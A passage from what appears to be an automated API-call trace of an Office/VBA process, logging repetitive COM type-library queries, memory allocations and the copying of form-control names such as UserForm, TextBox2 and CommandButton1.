| out: ppFuncDesc=0x183c80, pDummy=0xc0) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:LocalReleaseTypeAttr (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ccf078, ppTypeAttr=0x183c88, pDummy=0x183cc4 | out: ppTypeAttr=0x183c88, pDummy=0x183cc4*=0xffffffff) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x0, ppFuncDesc=0x183c80, pDummy=0x70 | out: ppFuncDesc=0x183c80, pDummy=0x70) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x1, ppFuncDesc=0x183c80, pDummy=0xf0 | out: ppFuncDesc=0x183c80, pDummy=0xf0) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x2, ppFuncDesc=0x183c80, pDummy=0x140 | out: ppFuncDesc=0x183c80, pDummy=0x140) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x3, ppFuncDesc=0x183c80, pDummy=0x140 | out: ppFuncDesc=0x183c80, pDummy=0x140) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x4, ppFuncDesc=0x183c80, pDummy=0xf0 | out: ppFuncDesc=0x183c80, pDummy=0xf0) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x5, ppFuncDesc=0x183c80, pDummy=0xf0 | out: ppFuncDesc=0x183c80, pDummy=0xf0) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x6, ppFuncDesc=0x183c80, pDummy=0x140 | out: ppFuncDesc=0x183c80, pDummy=0x140) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x7, ppFuncDesc=0x183c80, pDummy=0xf0 | out: ppFuncDesc=0x183c80, pDummy=0xf0) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x8, ppFuncDesc=0x183c80, pDummy=0xf0 | out: ppFuncDesc=0x183c80, pDummy=0xf0) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x9, ppFuncDesc=0x183c80, pDummy=0xf0 | out: ppFuncDesc=0x183c80, pDummy=0xf0) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0xa, ppFuncDesc=0x183c80, pDummy=0xf0 | out: ppFuncDesc=0x183c80, pDummy=0xf0) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0xb, ppFuncDesc=0x183c80, pDummy=0xf0 | out: ppFuncDesc=0x183c80, pDummy=0xf0) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0xc, ppFuncDesc=0x183c80, pDummy=0xf0 | out: ppFuncDesc=0x183c80, pDummy=0xf0) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0xd, ppFuncDesc=0x183c80, pDummy=0xf0 | out: ppFuncDesc=0x183c80, pDummy=0xf0) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0xe, ppFuncDesc=0x183c80, pDummy=0xf0 | out: ppFuncDesc=0x183c80, pDummy=0xf0) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0xf, ppFuncDesc=0x183c80, pDummy=0x140 | out: ppFuncDesc=0x183c80, pDummy=0x140) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x10, ppFuncDesc=0x183c80, pDummy=0xf0 | out: ppFuncDesc=0x183c80, pDummy=0xf0) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x11, ppFuncDesc=0x183c80, pDummy=0xf0 | out: ppFuncDesc=0x183c80, pDummy=0xf0) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x12, ppFuncDesc=0x183c80, pDummy=0xf0 | out: ppFuncDesc=0x183c80, pDummy=0xf0) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x13, ppFuncDesc=0x183c80, pDummy=0xf0 | out: ppFuncDesc=0x183c80, pDummy=0xf0) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x14, ppFuncDesc=0x183c80, pDummy=0xf0 | out: ppFuncDesc=0x183c80, pDummy=0xf0) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x15, ppFuncDesc=0x183c80, pDummy=0xf0 | out: ppFuncDesc=0x183c80, pDummy=0xf0) returned 0x0 [0041.983] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.983] ITypeInfo:LocalReleaseTypeAttr (This=0x6ccf078) returned 0x0 [0041.983] IUnknown:Release (This=0x6ccf078) returned 0x2 [0041.983] IMalloc:Alloc (This=0x7feffc15380, cb=0x40) returned 0x6b87de0 [0041.983] IMalloc:Alloc (This=0x7feffc15380, cb=0x40) returned 0x6b87e30 [0041.983] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183588 | out: ppvObject=0x183588*=0x0) returned 0x80004002 [0041.983] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ccf078, ppTypeAttr=0x183580, pDummy=0x10 | out: ppTypeAttr=0x183580, pDummy=0x10) returned 0x0 [0041.983] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183508 | out: ppvObject=0x183508*=0x0) returned 0x80004002 [0041.983] IUnknown:AddRef (This=0x6ccf078) returned 0x3 [0041.983] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ccf078, ppTypeAttr=0x183500, pDummy=0x10 | out: ppTypeAttr=0x183500, pDummy=0x10) returned 0x0 [0041.983] ITypeInfo:LocalReleaseTypeAttr (This=0x6ccf078) returned 0x0 [0041.983] IUnknown:Release (This=0x6ccf078) returned 0x2 [0041.983] strcpy_s (in: _Dst=0x6cab780, _DstSize=0x9, _Src="UserForm" | out: _Dst="UserForm") returned 0x0 [0041.983] IMalloc:Alloc (This=0x7feffc15380, cb=0x110) returned 0x6cc9b90 [0041.983] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ccf078, ppTypeAttr=0x1834c0, pDummy=0x6ccf078 | out: ppTypeAttr=0x1834c0, pDummy=0x6ccf078*=0xffe207b0) returned 0x0 [0041.983] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x6ccf078, ppTLib=0x1834c8, pIndex=0x183508 | out: ppTLib=0x1834c8*=0x6c93b80, pIndex=0x183508*=0x0) returned 0x0 [0041.983] ITypeLib:RemoteGetLibAttr (in: This=0x6c93b80, ppTLibAttr=0x1831b8, pDummy=0x0 | out: ppTLibAttr=0x1831b8, pDummy=0x0) returned 0x0 [0041.983] ITypeLib:RemoteGetDocumentation (in: This=0x6c93b80, index=-1, refPtrFlags=0x1831d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x183110 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x183110*=0x0) returned 0x0 [0041.983] strcpy_s (in: _Dst=0x6cab7b0, _DstSize=0xa, _Src="F3Dynamic" | out: _Dst="F3Dynamic") returned 0x0 [0041.983] IUnknown:AddRef (This=0x6c93b80) returned 0x4 [0041.983] ITypeLib:LocalReleaseTLibAttr (This=0x6c93b80) returned 0x0 [0041.983] ITypeInfo:LocalReleaseTypeAttr (This=0x6ccf078) returned 0x0 [0041.983] ITypeInfo:LocalReleaseTypeAttr (This=0x6ccf078) returned 0x0 [0041.983] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183588 | out: ppvObject=0x183588*=0x0) returned 0x80004002 [0041.983] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x183580, pDummy=0x10 | out: ppTypeAttr=0x183580, pDummy=0x10) returned 0x0 [0041.983] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183508 | out: ppvObject=0x183508*=0x0) returned 0x80004002 [0041.983] IUnknown:AddRef (This=0x6ceefc0) returned 0x9 [0041.983] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x183500, pDummy=0x10 | out: ppTypeAttr=0x183500, pDummy=0x10) returned 0x0 [0041.983] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.983] IUnknown:Release (This=0x6ceefc0) returned 0x8 [0041.983] strcpy_s (in: _Dst=0x6cab828, _DstSize=0x9, _Src="TextBox2" | out: _Dst="TextBox2") returned 0x0 [0041.984] IMalloc:Alloc (This=0x7feffc15380, cb=0xe0) returned 0x6c0d280 [0041.984] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x1834c0, pDummy=0x6ceefc0 | out: ppTypeAttr=0x1834c0, pDummy=0x6ceefc0*=0xffe207b0) returned 0x0 [0041.984] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x6ceefc0, ppTLib=0x1834c8, pIndex=0x183508 | out: ppTLib=0x1834c8*=0x6c935e0, pIndex=0x183508*=0x54) returned 0x0 [0041.984] ITypeLib:RemoteGetLibAttr (in: This=0x6c935e0, ppTLibAttr=0x1831b8, pDummy=0x0 | out: ppTLibAttr=0x1831b8, pDummy=0x0) returned 0x0 [0041.984] ITypeLib:RemoteGetDocumentation (in: This=0x6c935e0, index=-1, refPtrFlags=0x1831d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSForms", cchWideChar=8, lpMultiByteStr=0x183350, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSForms", lpUsedDefaultChar=0x0) returned 8 [0041.984] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6cabf80 [0041.984] IUnknown:AddRef (This=0x6c935e0) returned 0x15 [0041.984] ITypeLib:LocalReleaseTLibAttr (This=0x6c935e0) returned 0x0 [0041.984] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.984] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.984] IUnknown:QueryInterface (in: This=0x6cef120, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183588 | out: ppvObject=0x183588*=0x0) returned 0x80004002 [0041.984] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef120, ppTypeAttr=0x183580, pDummy=0x10 | out: ppTypeAttr=0x183580, pDummy=0x10) returned 0x0 [0041.984] IUnknown:QueryInterface (in: This=0x6cef120, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183508 | out: ppvObject=0x183508*=0x0) returned 0x80004002 [0041.984] IUnknown:AddRef (This=0x6cef120) returned 0x4 [0041.984] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef120, ppTypeAttr=0x183500, pDummy=0x10 | out: ppTypeAttr=0x183500, pDummy=0x10) returned 0x0 [0041.984] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef120) returned 0x0 [0041.984] IUnknown:Release (This=0x6cef120) returned 0x3 [0041.984] strcpy_s (in: _Dst=0x6cac008, _DstSize=0xa, _Src="ComboBox1" | out: _Dst="ComboBox1") returned 0x0 [0041.984] IMalloc:Alloc (This=0x7feffc15380, cb=0xe8) returned 0x6c0d370 [0041.984] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef120, ppTypeAttr=0x1834c0, pDummy=0x6cef120 | out: ppTypeAttr=0x1834c0, pDummy=0x6cef120*=0xffe207b0) returned 0x0 [0041.984] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x6cef120, ppTLib=0x1834c8, pIndex=0x183508 | out: ppTLib=0x1834c8*=0x6c935e0, pIndex=0x183508*=0x58) returned 0x0 [0041.984] ITypeLib:RemoteGetLibAttr (in: This=0x6c935e0, ppTLibAttr=0x1831b8, pDummy=0x0 | out: ppTLibAttr=0x1831b8, pDummy=0x0) returned 0x0 [0041.984] ITypeLib:RemoteGetDocumentation (in: This=0x6c935e0, index=-1, refPtrFlags=0x1831d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.984] ITypeLib:LocalReleaseTLibAttr (This=0x6c935e0) returned 0x0 [0041.984] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef120) returned 0x0 [0041.984] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef120) returned 0x0 [0041.985] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183588 | out: ppvObject=0x183588*=0x0) returned 0x80004002 [0041.985] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x183580, pDummy=0x10 | out: ppTypeAttr=0x183580, pDummy=0x10) returned 0x0 [0041.985] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183508 | out: ppvObject=0x183508*=0x0) returned 0x80004002 [0041.985] IUnknown:AddRef (This=0x6ceefc0) returned 0xa [0041.985] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x183500, pDummy=0x10 | out: ppTypeAttr=0x183500, pDummy=0x10) returned 0x0 [0041.985] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.985] IUnknown:Release (This=0x6ceefc0) returned 0x9 [0041.985] strcpy_s (in: _Dst=0x6cab858, _DstSize=0x6, _Src="Text1" | out: _Dst="Text1") returned 0x0 [0041.985] IMalloc:Alloc (This=0x7feffc15380, cb=0xe0) returned 0x6c0d460 [0041.985] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x1834c0, pDummy=0x6ceefc0 | out: ppTypeAttr=0x1834c0, pDummy=0x6ceefc0*=0xffe207b0) returned 0x0 [0041.985] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x6ceefc0, ppTLib=0x1834c8, pIndex=0x183508 | out: ppTLib=0x1834c8*=0x6c935e0, pIndex=0x183508*=0x54) returned 0x0 [0041.985] ITypeLib:RemoteGetLibAttr (in: This=0x6c935e0, ppTLibAttr=0x1831b8, pDummy=0x0 | out: ppTLibAttr=0x1831b8, pDummy=0x0) returned 0x0 [0041.985] ITypeLib:RemoteGetDocumentation (in: This=0x6c935e0, index=-1, refPtrFlags=0x1831d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.985] ITypeLib:LocalReleaseTLibAttr (This=0x6c935e0) returned 0x0 [0041.985] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.985] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.985] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183588 | out: ppvObject=0x183588*=0x0) returned 0x80004002 [0041.985] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x183580, pDummy=0x10 | out: ppTypeAttr=0x183580, pDummy=0x10) returned 0x0 [0041.985] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183508 | out: ppvObject=0x183508*=0x0) returned 0x80004002 [0041.985] IUnknown:AddRef (This=0x6ceefc0) returned 0xa [0041.985] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x183500, pDummy=0x10 | out: ppTypeAttr=0x183500, pDummy=0x10) returned 0x0 [0041.985] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.985] IUnknown:Release (This=0x6ceefc0) returned 0x9 [0041.985] strcpy_s (in: _Dst=0x6cac020, _DstSize=0x9, _Src="TextBox1" | out: _Dst="TextBox1") returned 0x0 [0041.985] IMalloc:Alloc (This=0x7feffc15380, cb=0xe0) returned 0x6c0d550 [0041.985] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x1834c0, pDummy=0x6ceefc0 | out: ppTypeAttr=0x1834c0, pDummy=0x6ceefc0*=0xffe207b0) returned 0x0 [0041.985] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x6ceefc0, ppTLib=0x1834c8, pIndex=0x183508 | out: ppTLib=0x1834c8*=0x6c935e0, pIndex=0x183508*=0x54) returned 0x0 [0041.985] ITypeLib:RemoteGetLibAttr (in: This=0x6c935e0, ppTLibAttr=0x1831b8, pDummy=0x0 | out: ppTLibAttr=0x1831b8, pDummy=0x0) returned 0x0 [0041.985] ITypeLib:RemoteGetDocumentation (in: This=0x6c935e0, index=-1, refPtrFlags=0x1831d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.986] ITypeLib:LocalReleaseTLibAttr (This=0x6c935e0) returned 0x0 [0041.986] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.986] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.986] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183588 | out: ppvObject=0x183588*=0x0) returned 0x80004002 [0041.986] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x183580, pDummy=0x10 | out: ppTypeAttr=0x183580, pDummy=0x10) returned 0x0 [0041.986] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183508 | out: ppvObject=0x183508*=0x0) returned 0x80004002 [0041.986] IUnknown:AddRef (This=0x6ceefc0) returned 0xa [0041.986] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x183500, pDummy=0x10 | out: ppTypeAttr=0x183500, pDummy=0x10) returned 0x0 [0041.986] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.986] IUnknown:Release (This=0x6ceefc0) returned 0x9 [0041.986] strcpy_s (in: _Dst=0x6ca6f88, _DstSize=0x6, _Src="date1" | out: _Dst="date1") returned 0x0 [0041.986] IMalloc:Alloc (This=0x7feffc15380, cb=0xe0) returned 0x6c0d640 [0041.986] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x1834c0, pDummy=0x6ceefc0 | out: ppTypeAttr=0x1834c0, pDummy=0x6ceefc0*=0xffe207b0) returned 0x0 [0041.986] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x6ceefc0, ppTLib=0x1834c8, pIndex=0x183508 | out: ppTLib=0x1834c8*=0x6c935e0, pIndex=0x183508*=0x54) returned 0x0 [0041.986] ITypeLib:RemoteGetLibAttr (in: This=0x6c935e0, ppTLibAttr=0x1831b8, pDummy=0x0 | out: ppTLibAttr=0x1831b8, pDummy=0x0) returned 0x0 [0041.986] ITypeLib:RemoteGetDocumentation (in: This=0x6c935e0, index=-1, refPtrFlags=0x1831d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.986] ITypeLib:LocalReleaseTLibAttr (This=0x6c935e0) returned 0x0 [0041.986] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.986] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.986] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183588 | out: ppvObject=0x183588*=0x0) returned 0x80004002 [0041.986] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x183580, pDummy=0x10 | out: ppTypeAttr=0x183580, pDummy=0x10) returned 0x0 [0041.986] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183508 | out: ppvObject=0x183508*=0x0) returned 0x80004002 [0041.986] IUnknown:AddRef (This=0x6ceefc0) returned 0xa [0041.986] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x183500, pDummy=0x10 | out: ppTypeAttr=0x183500, pDummy=0x10) returned 0x0 [0041.986] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.986] IUnknown:Release (This=0x6ceefc0) returned 0x9 [0041.986] strcpy_s (in: _Dst=0x6cac038, _DstSize=0xa, _Src="EditText1" | out: _Dst="EditText1") returned 0x0 [0041.986] IMalloc:Alloc (This=0x7feffc15380, cb=0xe0) returned 0x6c0d730 [0041.986] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x1834c0, pDummy=0x6ceefc0 | out: ppTypeAttr=0x1834c0, pDummy=0x6ceefc0*=0xffe207b0) returned 0x0 [0041.986] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x6ceefc0, ppTLib=0x1834c8, pIndex=0x183508 | out: ppTLib=0x1834c8*=0x6c935e0, pIndex=0x183508*=0x54) returned 0x0 [0041.987] ITypeLib:RemoteGetLibAttr (in: This=0x6c935e0, ppTLibAttr=0x1831b8, pDummy=0x0 | out: ppTLibAttr=0x1831b8, pDummy=0x0) returned 0x0 [0041.987] ITypeLib:RemoteGetDocumentation (in: This=0x6c935e0, index=-1, refPtrFlags=0x1831d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.987] ITypeLib:LocalReleaseTLibAttr (This=0x6c935e0) returned 0x0 [0041.987] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.987] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.987] IUnknown:QueryInterface (in: This=0x6cef280, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183588 | out: ppvObject=0x183588*=0x0) returned 0x80004002 [0041.987] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef280, ppTypeAttr=0x183580, pDummy=0x10 | out: ppTypeAttr=0x183580, pDummy=0x10) returned 0x0 [0041.987] IUnknown:QueryInterface (in: This=0x6cef280, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183508 | out: ppvObject=0x183508*=0x0) returned 0x80004002 [0041.987] IUnknown:AddRef (This=0x6cef280) returned 0x5 [0041.987] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef280, ppTypeAttr=0x183500, pDummy=0x10 | out: ppTypeAttr=0x183500, pDummy=0x10) returned 0x0 [0041.987] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef280) returned 0x0 [0041.987] IUnknown:Release (This=0x6cef280) returned 0x4 [0041.987] strcpy_s (in: _Dst=0x6cac068, _DstSize=0xf, _Src="CommandButton1" | out: _Dst="CommandButton1") returned 0x0 [0041.987] IMalloc:Alloc (This=0x7feffc15380, cb=0xc8) returned 0x6c2d710 [0041.987] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef280, ppTypeAttr=0x1834c0, pDummy=0x6cef280 | out: ppTypeAttr=0x1834c0, pDummy=0x6cef280*=0xffe207b0) returned 0x0 [0041.987] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x6cef280, ppTLib=0x1834c8, pIndex=0x183508 | out: 